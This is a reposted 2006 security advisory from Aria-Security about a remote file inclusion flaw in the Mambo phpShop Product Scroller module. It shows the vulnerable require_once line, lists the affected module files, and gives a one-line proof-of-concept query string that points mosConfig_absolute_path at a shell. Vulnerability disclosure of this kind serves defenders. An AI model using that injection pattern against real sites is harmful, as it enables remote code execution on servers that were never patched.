Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [SA21543] mail f/w system Mail Header Injection Vulnerability

  [SA21604] Drupal E-commerce Module Script Insertion Vulnerabilities

  [SA21603] Drupal Easylinks Module Script Insertion and SQL Injection

  [SA21584] Empire CMS "check_path"
File Inclusion Vulnerability

From:outlaw_(at)_aria-security.net <outlaw_(at)_aria-security.net>
Date:21.08.2006
Subject:mambo-phphop Product Scroller Module R.F.I

       ##########################################################################
#################
       #            Aria-Security.net Advisory                                        #
       #            Discovered  by: O.U.T.L.A.W                                       #    

       #            < www.Aria-security.net >                                            #
       #        Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp                            #
       #                                                                    #
       ##########################################################################
#################
#Software: mambo-phphop Product Scroller Module                                               
#Attack method: Remote File Inclusion

#Source:
  
/* Load the phpshop main parse code */
require_once( $mosConfig_absolute_path.'/components/com_phpshop/phpshop_parser.php' );


*********************************************************************************
***

#Vulnarable Files:
   mod_phpshop.php
   mod_phpshop_allinone.php
   mod_phpshop_cart.php
   mod_phpshop_featureprod.php
   mod_phpshop_latestprod.php
   mod_product_categories.php
   mod_productscroller.php
   mosproductsnap.php

                                              
#Proof of Concept:                                         
#one of the files above.php?mosConfig_absolute_path=SHELL
#                              
#----------------------------------------------------------                               
#                                                                 

                             
#                                                      
#Contact : Outlaw@aria-security.net                                                       
                                                           

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru
test server